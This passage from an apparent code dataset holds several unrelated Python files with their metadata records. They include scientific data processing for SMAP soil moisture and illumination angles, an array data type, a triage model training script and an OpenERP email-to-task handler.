-*- coding: utf-8 -*-\n# @Site : \n# @File : name_parser.py\n\n\ndef inputer():\n print(\"复制并粘贴今日未上报的通知信息,然后在末尾换行输入‘ok’\\n\")\n stopword = 'ok'\n context = ''\n for line in iter(input, stopword):\n context += line + '\\n'\n context = context.strip()\n return context\n\n\ndef parser():\n text = inputer()\n text = text.split(\"单位\")[-1].strip()\n return text\n","sub_path":"name_parser.py","file_name":"name_parser.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"252139015","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n__version__=\"1.0.0\"\n\n__doc__='''\n ############################ ILLUMINATION ANGLES FUNCTIONS ##############################\n ### Filename: angles.py\n ### Author: Pedro H. A. 
Hasselmann\n ###\n ### Compute the illumination angles from incidence, emergence, phase and azimuth angles.\n ### Spherical coordinates and local solar time are included.\n ###\n #########################################################################################\n'''\n### FUNCTIONS ####\n\ndef phase(i, e, phi):\n ''' Phase Angle.\n \n Parameters\n ==========\n i: incidence, e: emergence, phi: azimuth \n '''\n from numpy import sign, arccos, cos, sin\n return sign(e)*arccos( cos(i)*cos(e) + sin(i)*sin(e)*cos(phi) )\n\n\ndef azimuth(i, e, phase):\n ''' Azimuth.\n \n Parameters\n ==========\n i: incidence, e: emergence, phase: phase angle \n '''\n from numpy import cos, arccos, sin\n return arccos( (cos(phase) -cos(i)*cos(e))/(sin(i)*sin(e)) )\n\n\ndef cos_illum_lat(i, e, phi):\n ''' \n Luminance Latitude.\n \n Parameters\n ==========\n i: incidence, e: emergence, phi: azimuth\n '''\n from numpy import cos, arccos, sin, tan, sqrt \n sin2e_sin2i = sin(2e0*e) * sin(2e0*i)\n sinie2 = ( sin(i + e) )**2\n cosphi2 = ( cos(phi/2e0) )**2\n \n term1 = sinie2 -cosphi2*sin2e_sin2i\n \n return sqrt( term1/(term1 + ( sin(i)*sin(e)*sin(phi) )**2 ) )\n\n\ndef cos_illum_lon(e, coslat):\n ''' \n Luminance Longitude. 
\n '''\n from numpy import cos\n # Change sign if not contained by the photometric equator\n #sign = ones(ph.shape)\n #boolean = (ph < meridian_phase).values\n #sign[boolean] = -1e0\n #if isnan(meridian_phase): sign = -1e0 \n return cos(e)/coslat#*sign\n\n\ndef spherical_coord(X, Y, Z):\n ''' \n Spherical coordinates: latitude, longitude, radius\n \n Paramters\n =========\n X, Y, Z \n\n https://stackoverflow.com/questions/4116658/faster-numpy-cartesian-to-spherical-coordinate-conversion\n '''\n from numpy import degrees, sqrt, arctan2, arccos\n xy = X**2 + Y**2\n r = sqrt(xy + Z**2)\n lon = arctan2(Y, X)\n lat = arctan2(Z, sqrt(xy))\n return lat, lon, r\n\n\ndef orthorectification(l, alt0, alt1, res, c=(1014,1014)):\n '''\n Orthorectification.\n Correct a length l by distortion caused by viewing angle and distance.\n \n l : array of (X0,Y0,X1,Y1)\n alt0, alt1 : altitude in respect to points (X0, Y0) and (X1, Y1)\n res : pixel angular resolution (x_res, y_res)\n c : central reference (generally the middle of the image)\n '''\n from numpy import array, int32, sqrt, cos, sin, fabs, zeros, where\n\n ax1 = res[0]*(l[:,[0,2]]-c[0]) # X-column image\n ax2 = res[1]*(l[:,[1,3]]-c[1]) # Y-column image\n ax11, ax22 = ax1.copy(), ax2.copy()\n\n # Re-order the vectors\n # azimuth vector length must be larger than theta vector length\n c = where(ax1[:,0]ax2[:,1])\n ax22[:,0][c]=ax2[:,1][c]\n ax22[:,1][c]=ax2[:,0][c]\n az, theta = ax11.copy(), ax22.copy()\n \n c=fabs(az[:,0]-az[:,1])>fabs(theta[:,0]-theta[:,1])\n az[c,:]=ax22[c,:]\n theta[c,:]=ax11[c,:] \n \n # Orthorectified length\n r2 = alt0**2 +alt1**2 -2e0*alt0*alt1*(sin(theta[:,0])*sin(theta[:,1])*cos(az[:,0]-az[:,1]) +cos(theta[:,0])*cos(theta[:,1]))\n\n return sqrt(r2), theta, az\n\n\ndef solid_angle_tri(v1_v2, d):\n '''\n Compute projected triangular Solid Angle.\n Unit: stereoradians.\n\n Parameters\n ==========\n v1_v2 : 2D frame-projected coordinates.\n d : 1D observer distance at facet center.\n '''\n from numpy 
import float32, sum, sqrt\n \n s1 = sqrt(sum((v1_v2[:,0,:]-v1_v2[:,1,:])**2, axis=1))\n s2 = sqrt(sum((v1_v2[:,0,:]-v1_v2[:,2,:])**2, axis=1))\n s3 = sqrt(sum((v1_v2[:,1,:]-v1_v2[:,2,:])**2, axis=1))\n\n p = (s1+s2+s3)/2e0\n\n omega = sqrt(p*(p-s1)*(p-s2)*(p-s3))/(d**2)\n return omega.astype(float32)\n\n\n# END\n","sub_path":"support/angles.py","file_name":"angles.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394892339","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom numpy.linalg import slogdet as slogdet\nimport numpy as np\nimport os\nimport glob\n\nplt.style.use('ggplot')\n\ndfs = []\nos.chdir('resTARS')\ncols = [\"theta.1\",\"theta.2\",\"eta.1\",\"eta.2\",\"sigma\"]\nrealmeans = [0.25,0.3,2,3,0.01]\npriormeans = [0.5,0.5,2.5,2.5]\npriorstd = [np.sqrt(3)/6]*2+[np.sqrt(3)/2]*2+[np.sqrt(3)/6]\nfor nexp in os.listdir():\n os.chdir(nexp)\n for sampfile in glob.glob('*_*.csv'):\n tmpdf = pd.read_csv(sampfile,sep=',',comment='#',usecols=cols)\n tmpdf['nexp'] = int(nexp)\n [i1,i2,isigma] = sampfile[:-4].split('_')\n tmpdf['i1'] = float(i1)\n tmpdf['i2'] = float(i2)\n dfs.append(tmpdf)\n os.chdir('..')\nos.chdir('..')\n\n\ndf = pd.concat(dfs,ignore_index=True)\n\n#print(df)\n\ndf['IC'] = [\"{:.2f}\\n{:.2f}\".format(x,y) for (x,y) in zip(df.i1,df.i2)]\n\ngrps = df.groupby(['IC','nexp'])[cols]\ngmeans = grps.mean()\ngstds = grps.std()\ngscore = grps.apply(lambda g: -1/2*slogdet(g.cov())[1])\ngscore.name='score'\ngmeans = pd.concat([gmeans,gscore],axis=1)\ngmeans.reset_index(inplace=True)\ngstds.reset_index(inplace=True)\ngmeans['meanscore'] = gmeans.groupby(['IC'])['score'].transform('mean')\ngstds['meanscore'] = gmeans['meanscore']\ngmeans.sort_values(by='meanscore',ascending=False,inplace=True)\ngstds.sort_values(by='meanscore',ascending=False,inplace=True)\nplt.title('Means of different posterior distributions for each 
parameter')\n\nhlcol=\"#888888\"\nfor (i,y) in enumerate(cols[:4]):\n plt.subplot(510+i+2)\n plt.title(y)\n axm = sns.stripplot(data=gmeans,y=y,x='IC',jitter=True,alpha=0.5,zorder=1000)\n plt.setp(axm,ylabel=\"Mean\")\n plt.axhline(realmeans[i],color=hlcol,linewidth=1)\n plt.axhline(priormeans[i],linestyle='-.',color=hlcol,linewidth=1)\n plt.twinx()\n axs = sns.pointplot(data=gstds,y=y,x='IC',color='#606060',join=False,markers='x',ci='sd')\n plt.setp(axs,ylabel=\"Std\")\n if i < 3:\n plt.setp(axs,xticklabels=[])\n plt.setp(axm,xlabel=\"\")\n else:\n plt.setp(axm,xlabel=\"Initial Conditions\")\n axs.grid(None)\n plt.axhline(priorstd[i],linestyle=':',color=hlcol,linewidth=1)\n #pp =sns.pointplot(data=gmeans,x='IC',capsize=0.25,y=y,join=False)\n #pp.set(xlabel='Initial conditions')\n\nplt.subplot(511)\nvp = sns.violinplot(data=gmeans,x='IC',y='score',cut=0,inner=None)\nvs = sns.pointplot(data=gmeans,x='IC',y='score',color='#505050',join=False,ci='sd')\nplt.setp(vs,xticklabels=[],xlabel=\"\")\nplt.title(\"Score\")\n\nplt.show()\n","sub_path":"Exp2/mean_analyzer.py","file_name":"mean_analyzer.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179452259","text":"import ctypes\n\n\nclass Array:\n\n def __init__(self, size):\n \"\"\"\n Creates the array with specific size using the ctypes module.\n \"\"\"\n self._size = size\n PyArrayType = ctypes.py_object * size\n self._elements = PyArrayType()\n self.set_values(None)\n\n def __len__(self):\n \"\"\"\n Returns the length of the array.\n :return: int\n \"\"\"\n return self._size\n\n def set_values(self, value):\n \"\"\"\n Sets specific value to all the elements in the array.\n :param value: value\n :return: None\n \"\"\"\n for i in range(len(self)):\n self._elements[i] = value\n\n def __getitem__(self, index):\n \"\"\"\n Gets the contents of the index element.\n :param index: int\n :return: content of the element.\n \"\"\"\n 
assert 0 <= index < len(self), \"Array subscript out of range\"\n return self._elements[index]\n\n def __setitem__(self, index, value):\n \"\"\"\n Puts the value in the array element at index position.\n :param value: value\n :return: None\n \"\"\"\n assert 0 <= index < len(self), \"Array subscript out of range\"\n self._elements[index] = value\n\n # Returns the array's iterator for traversing the elements.\n def __iter__(self):\n return _ArrayIterator(self._elements)\n\n def __str__(self):\n \"\"\"\n Array representation.\n :return: str\n \"\"\"\n res = '['\n for el in self._elements:\n res += str(el) + ', '\n res = res[:-2] + ']'\n return res\n\n# An iterator for the Array ADT.\n\n\nclass _ArrayIterator:\n def __init__(self, the_array):\n self._array_ref = the_array\n self._cur_index = 0\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self._cur_index < len(self._array_ref):\n entry = self._array_ref[self._cur_index]\n self._cur_index += 1\n return entry\n else:\n raise StopIteration\n\n\nclass Array2D:\n \"\"\"\n Creates a 2-D array of size numRows x numCols.\n \"\"\"\n\n def __init__(self, num_rows, num_cols):\n \"\"\"\n Creates the 2-D array of the specific size: num_rows and num_cols.\n \"\"\"\n self.rows = Array(num_rows)\n for i in range(num_rows):\n self.rows[i] = Array(num_cols)\n\n def num_rows(self):\n \"\"\"\n Returns the number of rows in the 2-D array.\n :return: int\n \"\"\"\n return len(self.rows)\n\n def num_cols(self):\n \"\"\"\n Returns the number of columns in the 2-D array.\n :return: int\n \"\"\"\n return len(self.rows[0])\n\n def set_value(self, value):\n \"\"\"\n Sets specific value to all the elements in the array.\n :return: None\n \"\"\"\n for row in self.rows:\n row.set_values(value)\n\n def __getitem__(self, index_tuple):\n \"\"\"\n Gets the contents of the element at position [i, j].\n :param index_tuple: tuple\n :return: content of the element.\n \"\"\"\n assert len(index_tuple) == 2, \"Invalid number of array 
subscripts.\"\n row, col = index_tuple\n assert 0 <= row < self.num_rows() and 0 <= col < self.num_cols(), \\\n \"Array subscript out of range.\"\n array_1d = self.rows[row]\n return array_1d[col]\n\n def __setitem__(self, index_tuple, value):\n \"\"\"\n Sets the contents of the element at position [i,j] to value.\n :param index_tuple: tuple\n :param value: value\n :return: None\n \"\"\"\n assert len(index_tuple) == 2, \"Invalid number of array subscripts.\"\n row, col = index_tuple\n assert 0 <= row < self.num_rows() and 0 <= col < self.num_cols(), \\\n \"Array subscript out of range.\"\n array_1d = self.rows[row]\n array_1d[col] = value\n\n def __str__(self):\n res = '[\\n'\n for row in array2.rows:\n res += str(row) + '\\n'\n return res + ']'\n\n\nif __name__ == '__main__':\n # Testing Array\n array1 = Array(10)\n # print(array1)\n assert array1.__len__() == 10\n array1.set_values(95)\n # print(array1)\n for index in range(10):\n assert array1.__getitem__(index) == 95\n array1.__setitem__(3, 51)\n # print(array1)\n assert array1.__getitem__(3) == 51\n\n # Testing Array 2D\n array2 = Array2D(5, 4)\n assert array2.num_rows() == 5\n assert array2.num_cols() == 4\n # print(array2)\n array2.set_value(95)\n # print(array2)\n assert array2.__getitem__((3, 3)) == 95\n array2.__setitem__((2, 2), 20)\n # print(array2)\n assert array2.__getitem__((2, 2)) == 20","sub_path":"mass-media/ADT/ADT.py","file_name":"ADT.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"358510723","text":"\nimport numpy as np\nimport pandas as pd\n\nfrom pathlib import Path\nfrom collections import OrderedDict\n\nfrom netCDF4 import Dataset, num2date, date2num\n\nfrom myprojects.io.grids import EASE2\nfrom myprojects.io.netcdf import ncfile_init\n\nimport h5py\n\nclass SMAP_io(object):\n\n def __init__(self):\n self.path = Path(r\"D:\\data_sets\\SMAP\\SPL2SMP.008\\reformated\")\n self.ds_ts = 
Dataset(r\"D:\\data_sets\\SMAP\\SPL2SMP.008\\reformated\\timeseries.nc\")\n\n grid = EASE2('M36')\n self.lats = grid.ease_lats\n self.lons = grid.ease_lons\n\n def latlon2gpi(self, lat, lon):\n return np.argmin((self.lons - lon)**2 + (self.lats - lat)**2)\n\n def read(self, lat, lon, qc=True, rowcol=False):\n\n if rowcol:\n row, col = lat, lon\n else:\n row = np.argmin(np.abs(self.lats-lat))\n col = np.argmin(np.abs(self.lons-lon))\n\n dt = self.ds_ts['dt'][:, row, col]\n dt[dt.mask] = np.nan\n\n dates = self.ds_ts['time'][:]\n dates[~np.isnan(dt)] += dt[~np.isnan(dt)]\n smap_ts = pd.DataFrame(index=pd.DatetimeIndex(num2date(dates, self.ds_ts['time'].units,\n only_use_python_datetimes=True, only_use_cftime_datetimes=False)))\n\n variables = ['soil_moisture', 'soil_moisture_error',\n 'retrieval_qual_flag', 'surface_flag',\n 'vegetation_opacity', 'vegetation_water_content',\n 'landcover_class', 'landcover_class_fraction']\n for var in variables:\n smap_ts[var] = self.ds_ts[var][:, row, col]\n\n smap_ts = smap_ts[~np.isnan(dt.data)]\n\n if qc:\n smap_ts = smap_ts[(smap_ts['surface_flag'] == 1024) | \\\n (smap_ts['retrieval_qual_flag'] == 0) | \\\n (smap_ts['retrieval_qual_flag'] == 8)]\n\n # if len(smap_ts) == 0:\n # print(f'No valid SMAP data for {lat:.2f} / {lon:.2f}')\n # smap_ts = None\n\n return smap_ts[~np.isnan(smap_ts['soil_moisture'])]\n\n def close(self):\n self.ds_ts.close()\n\n\ndef remove_corrupt_h5_files_l3():\n\n root = Path(r'D:\\data_sets\\SMAP\\SPL3SMP.008\\raw')\n paths = sorted(root.glob('*'))\n for path in paths:\n files = sorted(path.glob('*.h5'))\n if len(files) == 0:\n print(f'No files in {path.name}')\n path.unlink()\n elif len(files) > 1:\n for f in files[:-1]:\n trg = path.parents[1] / 'corrupt' / path.name\n if not trg.exists():\n Path.mkdir(trg, parents=True)\n f.rename(path.parents[1] / 'corrupt' / path.name / f.name)\n else:\n continue\n\ndef create_L2_image_stack():\n\n root = Path(r\"D:\\data_sets\\SMAP\\SPL2SMP.008\\raw\")\n fout = 
root.parent / 'reformated' / 'images.nc'\n if not fout.parent.exists():\n Path.mkdir(fout.parent, parents=True)\n\n files = sorted(root.glob('**/*.h5'))\n t0s = pd.to_datetime([f.name[-29:-14] for f in files]).values\n u, i, c = np.unique(t0s, return_index=True, return_counts=True)\n t0s[i[c > 1]] += pd.Timedelta('1s') # sometimes Asc. and Dsc. files have same time stamp.\n dates = pd.Series(index=t0s).resample('12h').nearest().index\n\n grid = EASE2(gtype='M36')\n lats = grid.ease_lats\n lons = grid.ease_lons\n\n variables = ['dt',\n 'soil_moisture', 'soil_moisture_error',\n 'retrieval_qual_flag', 'surface_flag',\n 'vegetation_opacity', 'vegetation_water_content',\n 'landcover_class', 'landcover_class_fraction']\n\n dimensions = OrderedDict([('time', dates), ('lat', lats), ('lon', lons)])\n with ncfile_init(fout, dimensions, variables) as ds:\n\n for i, (f, t0) in enumerate(zip(files,t0s)):\n print(f'{i} / {len(files)}')\n dts = t0 - dates\n t = np.argmin(np.abs(dts))\n with h5py.File(f, mode='r') as arr:\n rows = arr[f'Soil_Moisture_Retrieval_Data']['EASE_row_index'][:].astype('int')\n cols = arr[f'Soil_Moisture_Retrieval_Data']['EASE_column_index'][:].astype('int')\n for var in variables:\n tmp_data = ds[var][t, :, :]\n if var == 'dt':\n tmp_data[rows, cols] = dts[t].total_seconds() / 3600 / 24\n ds[var][t, :, :] = tmp_data\n elif 'landcover' in var:\n tmp_data[rows, cols] = arr[f'Soil_Moisture_Retrieval_Data'][var][:, 0]\n ds[var][t, :, :] = tmp_data\n else:\n tmp_data[rows, cols] = arr[f'Soil_Moisture_Retrieval_Data'][var][:]\n ds[var][t, :, :] = tmp_data\n\n\ndef create_L3_image_stack():\n\n root = Path(r\"D:\\data_sets\\SMAP\\SPL3SMP.008\\raw\")\n fout = root.parent / 'reformated' / 'images.nc'\n\n files = sorted(root.glob('**/*.h5'))\n dates = pd.to_datetime([f.parent.name for f in files])\n\n grid = EASE2(gtype='M36')\n lats = grid.ease_lats\n lons = grid.ease_lons\n\n variables = ['retrieval_qual_flag', 'surface_flag',\n 'vegetation_opacity', 
'vegetation_water_content',\n 'landcover_class', 'landcover_class_fraction',\n 'soil_moisture', 'soil_moisture_error']\n\n file_vars = [f'{var}_{orbit}' for var in variables for orbit in ['am', 'pm']] + \\\n ['soil_moisture','vegetation_opacity','vegetation_water_content','landcover_class', 'landcover_class_fraction']\n dimensions = OrderedDict([('time', dates), ('lat', lats), ('lon', lons)])\n with ncfile_init(fout, dimensions, file_vars) as ds:\n\n for t, f in enumerate(files):\n print(f'{t} / {len(files)}')\n\n with h5py.File(f, mode='r') as arr:\n for orbit in ['AM','PM']:\n ext = '_pm' if orbit == 'PM' else ''\n for var in variables:\n if 'landcover' in var:\n ds[f'{var}_{orbit.lower()}'][t, :, :] = arr[f'Soil_Moisture_Retrieval_Data_{orbit}'][f'{var}{ext}'][:, :, 0]\n else:\n ds[f'{var}_{orbit.lower()}'][t, :, :] = arr[f'Soil_Moisture_Retrieval_Data_{orbit}'][f'{var}{ext}'][:, :]\n\n mask_am = (arr[f'Soil_Moisture_Retrieval_Data_AM'][f'surface_flag'][:, :] != 1024) & \\\n (arr[f'Soil_Moisture_Retrieval_Data_AM'][f'retrieval_qual_flag'][:, :] != 0) & \\\n (arr[f'Soil_Moisture_Retrieval_Data_AM'][f'retrieval_qual_flag'][:, :] != 8)\n mask_pm = (arr[f'Soil_Moisture_Retrieval_Data_PM'][f'surface_flag_pm'][:, :] != 1024) & \\\n (arr[f'Soil_Moisture_Retrieval_Data_PM'][f'retrieval_qual_flag_pm'][:, :] != 0) & \\\n (arr[f'Soil_Moisture_Retrieval_Data_PM'][f'retrieval_qual_flag_pm'][:, :] != 8)\n\n tmp_am = arr[f'Soil_Moisture_Retrieval_Data_AM'][f'soil_moisture'][:, :]\n tmp_pm = arr[f'Soil_Moisture_Retrieval_Data_PM'][f'soil_moisture_pm'][:, :]\n tmp_am[mask_am] = np.nan\n tmp_pm[mask_pm] = np.nan\n tmp_am[tmp_am == -9999.] = np.nan\n tmp_pm[tmp_pm == -9999.] 
= np.nan\n ds['soil_moisture'][t, :, :] = np.nanmean([tmp_am, tmp_pm],axis=0)\n\n tmp_am = arr[f'Soil_Moisture_Retrieval_Data_AM'][f'vegetation_opacity'][:, :]\n tmp_pm = arr[f'Soil_Moisture_Retrieval_Data_PM'][f'vegetation_opacity_pm'][:, :]\n tmp_am[mask_am] = np.nan\n tmp_pm[mask_pm] = np.nan\n tmp_am[tmp_am == -9999.] = np.nan\n tmp_pm[tmp_pm == -9999.] = np.nan\n ds['vegetation_opacity'][t, :, :] = np.nanmean([tmp_am, tmp_pm],axis=0)\n\n tmp_am = arr[f'Soil_Moisture_Retrieval_Data_AM'][f'vegetation_water_content'][:, :]\n tmp_pm = arr[f'Soil_Moisture_Retrieval_Data_PM'][f'vegetation_water_content_pm'][:, :]\n tmp_am[mask_am] = np.nan\n tmp_pm[mask_pm] = np.nan\n tmp_am[tmp_am == -9999.] = np.nan\n tmp_pm[tmp_pm == -9999.] = np.nan\n ds['vegetation_water_content'][t, :, :] = np.nanmean([tmp_am, tmp_pm],axis=0)\n\n tmp_am = arr[f'Soil_Moisture_Retrieval_Data_AM'][f'landcover_class'][:, :, 0]\n tmp_pm = arr[f'Soil_Moisture_Retrieval_Data_PM'][f'landcover_class_pm'][:, :, 0]\n tmp_am[mask_am] = 254\n tmp_pm[mask_pm] = 254\n tmp_data = np.full(tmp_am.shape, 254)\n tmp_data[(tmp_am != 254) & (tmp_pm == 254)] = tmp_am[(tmp_am != 254) & (tmp_pm == 254)]\n tmp_data[(tmp_am == 254) & (tmp_pm != 254)] = tmp_pm[(tmp_am == 254) & (tmp_pm != 254)]\n tmp_data[(tmp_am != 254) & (tmp_pm != 254)] = tmp_am[(tmp_am != 254) & (tmp_pm != 254)]\n ds['landcover_class'][t, :, :] = tmp_data\n\n tmp_am = arr[f'Soil_Moisture_Retrieval_Data_AM'][f'landcover_class_fraction'][:, :, 0]\n tmp_pm = arr[f'Soil_Moisture_Retrieval_Data_PM'][f'landcover_class_fraction_pm'][:, :, 0]\n tmp_am[mask_am] = 254\n tmp_pm[mask_pm] = 254\n tmp_data = np.full(tmp_am.shape, 254)\n tmp_data[(tmp_am != 254) & (tmp_pm == 254)] = tmp_am[(tmp_am != 254) & (tmp_pm == 254)]\n tmp_data[(tmp_am == 254) & (tmp_pm != 254)] = tmp_pm[(tmp_am == 254) & (tmp_pm != 254)]\n tmp_data[(tmp_am != 254) & (tmp_pm != 254)] = tmp_am[(tmp_am != 254) & (tmp_pm != 254)]\n ds['landcover_class_fraction'][t, :, :] = tmp_data\n\n\nif 
__name__=='__main__':\n # create_L2_image_stack()\n # create_L3_image_stack()\n # remove_corrupt_h5_files_l2()\n\n pass\n\n# ncks -4 -L 4 --cnk_dmn time,10000 --cnk_dmn lat,1 --cnk_dmn lon,1 images.nc timeseries.nc\n\n","sub_path":"io/smap.py","file_name":"smap.py","file_ext":"py","file_size_in_byte":10180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"325657461","text":"import pandas as pd\r\nimport os\r\nimport psutil\r\nimport time\r\nimport logging\r\n\r\nsettings = {\r\n 'newfile': False,\r\n 'testing': True\r\n}\r\n\r\n\r\ndef main():\r\n logging.basicConfig(level=('DEBUG' if settings['testing'] else 'WARNING'))\r\n start = time.time()\r\n process = psutil.Process(os.getpid())\r\n logging.debug('Baseline memory in use: {}MB'.format(round(process.memory_info().rss / 1024.0 / 1024, 2)))\r\n\r\n df = None\r\n\r\n # new file. convert from Excel to CSV, then extract the description columns.\r\n if settings['newfile']:\r\n convert_to_csv()\r\n extract_text()\r\n else:\r\n # I chose not to do these operations when we have a new file, instead running it seperately. WHen importing\r\n # from CSV, memory usage is significantly less.\r\n df = pd.read_csv('WO_single.csv', encoding='utf-8')\r\n\r\n # print column non-NaN count\r\n logging.info('Number of completed values per column:\\n{}'.format(df.count()))\r\n\r\n finish = time.time()\r\n logging.debug('Operations completed. Memory in use: {}MB'.format(round(process.memory_info().rss / 1024.0 / 1024, 2)))\r\n logging.info('Elapsed time: {} seconds'.format(round(finish - start, 2)))\r\n\r\n\r\ndef convert_to_csv():\r\n df = pd.read_excel('WO_single.xlsx')\r\n df.rename(columns={0: \"ID\"}) # This doesn't seem to work. 
Haven't found a single method so far to rename a column.\r\n df.to_csv('WO_single.csv', encoding='UTF-8')\r\n\r\n\r\ndef extract_text():\r\n df = pd.read_csv('WO_single.csv', encoding='utf-8')\r\n dfe = df[['description', 'description1']]\r\n dfe.to_csv('WO_language.csv', encoding='utf-8')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"606944337","text":"from CloudCompute_Py.Vectors import *\norigin = Vector(0, 0, 0)\np1 = Vector(2, 3, 5, 5, 6)\np2 = Vector(1, -1, -2)\n#Adds vectors\np1 + p2\n#Subtracts vectors\np1 - p2\n#Same as subtracting\np1 + -p2\n#Returns p1 set to the length of p2\np1 & p2\n#Sets p1's length to p2\np1 &= p2\n#Shifts all elements of p1 to the left 2, and other values are now 0\np1 << 2\n#returns the length of the vector of p1\n~p1\n#returns the magnitude of p1\np1 % 0\n#returns the distance between p1 and p2\np1 % p2\n#returns p1 divided by 2\np1 / 2\n#returns p1 muliplied by 2\np1 * 2\n#Returns pointwise multiplication of p1 and p2\np1 * p2\n\nfrom CloudCompute_Py.Complex import *\na = Complex(arg=math.pi, rad=2)\nb = Complex(-2, 3)\n\nprint(a)\n\n\n\n\n","sub_path":"python/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"188301109","text":"from triage_ml import train_radius_variance\nfrom triage_ml.data.dataset import DataSet\nfrom triage_ml.triage_api import TriageAPI\nfrom triage_ml.data.visualizations import visualize_training_results\n\nimport sys\nfrom typing import Text\nfrom datetime import datetime\nimport os\nimport argparse\nimport requests\n\n\nTRIAGE_API_URL = os.getenv('TRIAGE_API_URL')\nTRIAGE_API_USER = os.getenv('TRIAGE_API_USER')\nTRIAGE_API_PASS = os.getenv('TRIAGE_API_PASS')\n\nDATE_FORMAT = 
'%Y-%m-%d'\n\nMODELS = {\n 'radius_variance': train_radius_variance\n}\n\n\ndef _load_dataset_from_file(file_name: Text) -> DataSet:\n data = []\n with open(file_name) as f:\n for line in f.readlines():\n line = line.rstrip().split(',')\n data.append((\n int(line[0]),\n int(line[1]),\n datetime.strptime(line[2], '%Y-%m-%d'),\n ))\n\n return DataSet(data)\n\n\ndef parse_args(args):\n \"\"\"\n Parser configuration\n :return: parsed augments object\n \"\"\"\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-m', '--model', required=True, choices=MODELS.keys(),\n help='The name of the model to train.')\n parser.add_argument('-c', '--clinic_id', required=True, type=int,\n help='The ID of the clinic whose data to use for training.')\n parser.add_argument('-s', '--severity', required=True, type=int,\n help='The triage severity level to train on.')\n parser.add_argument('-e', '--epochs', default=100, type=int,\n help='Number of passes through the dataset to train for.')\n parser.add_argument('-lr', '--learning_rate', default=0.001, type=float,\n help='The gradient descent learning rate.'),\n parser.add_argument('-p', '--persist', default=False, type=bool,\n help='Whether training weights should be persisted to database.')\n parser.add_argument('-w', '--weights', default='weights.h5', type=str,\n help='The path to write training weights to.')\n parser.add_argument('-r', '--results', default='results.png', type=str,\n help='The path to write the results graph to.')\n\n # If pulling data from API\n parser.add_argument('-sd', '--start_date', help=f'The start date of the data. Format: {DATE_FORMAT}')\n parser.add_argument('-ed', '--end_date', help=f'The end date of the data. 
Format: {DATE_FORMAT}')\n\n # If using local data\n parser.add_argument('-d', '--dataset',\n help='An optional local dataset to train on instead')\n\n return parser.parse_args(args)\n\n\ndef main(http=requests, str_args=None):\n \"\"\"\n Entrypoint for triage-train.\n \"\"\"\n args = parse_args(str_args or sys.argv[1:])\n triage_api = TriageAPI(TRIAGE_API_URL, TRIAGE_API_USER, TRIAGE_API_PASS, http)\n\n if args.dataset:\n dataset = _load_dataset_from_file(args.dataset)\n else:\n start_date = datetime.strptime(args.start_date, DATE_FORMAT)\n end_date = datetime.strptime(args.end_date, DATE_FORMAT)\n dataset = triage_api.get_data(args.clinic_id, args.severity, start_date, end_date)\n\n dataset.filter_on('clinic_id', lambda c_id: c_id == args.clinic_id)\n dataset.filter_on('severity', lambda s: s == args.severity)\n trained_model, train_data, test_data, history = train_radius_variance(dataset,\n epochs=args.epochs,\n lr=args.learning_rate,\n output_file=args.weights)\n\n if args.persist:\n triage_api.post_weights(args.clinic_id, args.severity, args.weights, history.history['val_loss'][-1])\n\n visualize_training_results(trained_model, train_data, test_data, args.results)\n","sub_path":"ml-training/triage_ml/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"435993429","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom osv import fields,osv\nfrom tools.translate import _\nimport binascii\n\nclass project_tasks(osv.osv):\n _name = \"project.task\"\n _inherit = ['mailgate.thread','project.task']\n \n _columns={\n 'message_ids': fields.one2many('mailgate.message', 'res_id', 'Messages', domain=[('model','=',_name)], readonly=True),\n }\n def message_new(self, cr, uid, msg, context=None):\n# \"\"\"\n# Automatically calls when new email message arrives\n#\n# @param self: The object pointer\n# @param cr: the current row, from the database cursor,\n# @param uid: the current user’s ID for security checks\n# \"\"\"\n mailgate_obj = self.pool.get('email.server.tools')\n subject = msg.get('subject')\n body = msg.get('body')\n msg_from = msg.get('from')\n priority = msg.get('priority')\n\n data = { \n 'name': subject,\n 'description': body,\n 'planned_hours' : 0.0,\n }\n res = mailgate_obj.get_partner(cr, uid, msg_from)\n if res:\n data.update(res)\n res = self.create(cr, uid, data) \n \n attachments = msg.get('attachments', [])\n att_ids = []\n for attachment in attachments or []:\n data_attach = {\n 'name': attachment,\n 'datas':binascii.b2a_base64(str(attachments.get(attachment))),\n 'datas_fname': attachment,\n 'description': 'Mail attachment',\n 'res_model': self._name,\n 'res_id': res,\n }\n att_ids.append(self.pool.get('ir.attachment').create(cr, uid, data_attach))\n\n return res,att_ids \n \n def message_update(self, cr, uid, id, msg, data={}, default_act='pending'): \n mailgate_obj = 